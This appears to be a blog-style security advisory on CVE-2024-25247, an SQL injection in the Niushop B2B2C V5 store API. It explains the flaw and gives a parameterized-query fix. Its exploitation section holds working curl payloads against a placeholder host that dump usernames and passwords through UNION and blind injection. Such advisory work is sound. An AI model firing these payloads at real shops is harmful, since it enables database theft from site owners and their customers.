A serious vulnerability, tracked as CVE-2024-25247, has been discovered in the popular Niushop B2B2C V5 e-commerce system. This flaw opens the door for attackers to execute arbitrary SQL commands via the 'latitude' and 'longitude' parameters in the /app/api/controller/Store.php file. If you use Niushop B2B2C, you must read this and check your installation—your data and your customers are at risk.
What is CVE-2024-25247?
CVE-2024-25247 is an SQL Injection vulnerability. It affects all installations of Niushop B2B2C V5 where user input in the API (/app/api/controller/Store.php) is not properly sanitized. This means an attacker can inject malicious SQL via API requests to steal, modify, or delete database records.
Original CVE record:
https://nvd.nist.gov/vuln/detail/CVE-2024-25247
Let’s look at a simplified version of the vulnerable code inside Store.php
// In /app/api/controller/Store.php
public function getStoreList() {
$latitude = $_GET['latitude'];
$longitude = $_GET['longitude'];
// Build SQL query with user input directly!
$sql = "SELECT * FROM stores WHERE latitude = '$latitude' AND longitude = '$longitude'";
$result = $this->db->query($sql);
// ...
}
What's wrong?
User-supplied $latitude and $longitude are put directly into the SQL query with no filtering.
- This allows an attacker to send crafted text that breaks out of the intended query and runs any SQL they want.
Exploitation Details: Example Attack
Assume Niushop is running at https://victim.site.
Suppose an attacker crafts a URL like this
https://victim.site/app/api/controller/Store.php?latitude='%20OR%201=1%23&longitude=
This makes the SQL look like this
SELECT * FROM stores WHERE latitude = '' OR 1=1#' AND longitude = ''
By changing the query to use a UNION, an attacker could grab data from another table
curl "https://victim.site/app/api/controller/Store.php?latitude='%20UNION%20SELECT%20id,username,password,4,5%20FROM%20users%20--%20&longitude="
Attackers could also perform *blind* SQL injection when no errors are shown
curl "https://victim.site/app/api/controller/Store.php?latitude='%20AND%20(SELECT%20ASCII(SUBSTR(password,1,1))%20FROM%20users%20LIMIT%201)=49%20--%20&longitude="
This manually checks if the first character in the password is '1' (ASCII 49).
*Reminder: Blind SQL injection is slow but can extract full DB contents.*
Online References
- CVE-2024-25247 on NVD
- Niushop GitHub
- SQL Injection Basics - OWASP
- (Check for vendors updates and patches—we recommend following CNVD and the official Niushop site)
How to Fix It
If you use Niushop B2B2C V5, patch your software immediately.
If no official patch yet, you can secure your code with these steps
1. Validate Input: Only accept numeric values for latitude/longitude.
Example Fix
$latitude = floatval($_GET['latitude']);
$longitude = floatval($_GET['longitude']);
$stmt = $this->db->prepare("SELECT * FROM stores WHERE latitude = ? AND longitude = ?");
$stmt->bind_param('dd', $latitude, $longitude);
$stmt->execute();
$result = $stmt->get_result();
This effectively stops attackers from injecting SQL code.
Conclusion and Recommendations
CVE-2024-25247 is a critical vulnerability with real-world consequences. If you're running Niushop B2B2C V5, act now:
Use parameterized queries always
If you want to check your own instance for SQL injection, use tools like sqlmap (with permission) and keep an eye on vendor security advisories.
Stay safe!
*If you have questions, drop them below or reach out to Niushop for support.*
Timeline
Published on: 02/26/2024 23:15:07 UTC
Last modified on: 08/29/2024 20:36:18 UTC